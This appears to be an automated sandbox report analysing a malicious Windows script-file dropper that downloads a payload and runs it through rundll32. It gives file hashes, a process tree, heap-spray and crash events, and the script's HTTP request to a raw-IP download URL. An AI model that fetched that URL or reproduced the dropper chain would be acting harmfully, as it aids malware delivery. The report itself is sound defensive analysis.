Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 20, 2023, 11:15 a.m.	April 20, 2023, 11:17 a.m.

Size	18.1KB
Type	Non-ISO extended-ASCII text, with very long lines, with CRLF, LF line terminators
MD5	`0038e8cfc6deaa5e8b9ba11affaeea2d`
SHA256	`6c861ff6546836d6a76f5444f8a70f4d6c65f2369f76557822bce2b1a40b802e`
CRC32	`58F2C681`
ssdeep	`384:AZwOuqQwE5nyzJcqHTaomG5RCxIVdVxeZJ:ATumW0TaD+oxItx0`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Complaint_Copy_838511.wsf
2556
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\ProgramData\aq2B7wGiC3vz.tmp,Motd
  2772

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
103.20.235.243	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 20, 2023, 11:15 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 20, 2023, 11:15 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25 rundll32+0x135c @ 0xda135c rundll32+0x1901 @ 0xda1901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75ac3ef4 registers.esp: 1045932 registers.edi: 0 registers.eax: 13339280 registers.ebp: 1045960 registers.edx: 1 registers.ebx: 0 registers.esi: 4983192 registers.ecx: 1932342748	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 20, 2023, 11:15 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25
rundll32+0x135c @ 0xda135c
rundll32+0x1901 @ 0xda1901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75ac3ef4
registers.esp: 1045932
registers.edi: 0
registers.eax: 13339280
registers.ebp: 1045960
registers.edx: 1
registers.ebx: 0
registers.esi: 4983192
registers.ecx: 1932342748

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://103.20.235.243/aSxBaqnfj98wz.dat

Performs some HTTP requests (1 event)

request

GET http://103.20.235.243/aSxBaqnfj98wz.dat

Communicates with host for which no DNS query was performed (1 event)

host

103.20.235.243

Wscript.exe initiated network communications indicative of a script based payload download (3 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 20, 2023, 11:15 a.m.	url: http://103.20.235.243/aSxBaqnfj98wz.dat flags: 0	1	1
HttpOpenRequestW April 20, 2023, 11:15 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /aSxBaqnfj98wz.dat	1	13369356
InternetReadFile April 20, 2023, 11:15 a.m.	buffer: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> request_handle: 0x00cc000c	1	1

wscript.exe-based dropper (JScript, VBS) (1 event)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (5 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 20, 2023, 11:15 a.m.	url: http://103.20.235.243/aSxBaqnfj98wz.dat flags: 0	1	1
HttpOpenRequestW April 20, 2023, 11:15 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /aSxBaqnfj98wz.dat	1	13369356
send April 20, 2023, 11:15 a.m.	buffer: ! socket: 864 sent: 1	1	1
send April 20, 2023, 11:15 a.m.	buffer: GET /aSxBaqnfj98wz.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 103.20.235.243 Connection: Keep-Alive socket: 936 sent: 309	1	309
send April 20, 2023, 11:15 a.m.	buffer: ! socket: 864 sent: 1	1	1

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\rundll32.exe" C:\ProgramData\aq2B7wGiC3vz.tmp,Motd
parent_process	wscript.exe				martian_process	rundll32 C:\ProgramData\aq2B7wGiC3vz.tmp,Motd

A potential heapspray has been detected. 2877 megabytes was sprayed onto the heap of the wscript.exe process (12 events)

count

3889

name

heapspray

process

wscript.exe

total_mb

106

length

28672

protection

PAGE_READWRITE

count

3890

name

heapspray

process

wscript.exe

total_mb

151

length

40960

protection

PAGE_READWRITE

count

19423

name

heapspray

process

wscript.exe

total_mb

606

length

32768

protection

PAGE_READWRITE

count

11654

name

heapspray

process

wscript.exe

total_mb

500

length

45056

protection

PAGE_READWRITE

count

7793

name

heapspray

process

wscript.exe

total_mb

length

8192

protection

PAGE_READWRITE

count

38847

name

heapspray

process

wscript.exe

total_mb

455

length

12288

protection

PAGE_READWRITE

count

7770

name

heapspray

process

wscript.exe

total_mb

182

length

24576

protection

PAGE_READWRITE

count

58292

name

heapspray

process

wscript.exe

total_mb

227

length

4096

protection

PAGE_READWRITE

count

3889

name

heapspray

process

wscript.exe

total_mb

length

20480

protection

PAGE_READWRITE

count

7768

name

heapspray

process

wscript.exe

total_mb

273

length

36864

protection

PAGE_READWRITE

count

3887

name

heapspray

process

wscript.exe

total_mb

182

length

49152

protection

PAGE_READWRITE

count

3894

name

heapspray

process

wscript.exe

total_mb

length

16384

protection

PAGE_READWRITE

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\rundll32.exe

Complaint_Copy_838511.wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All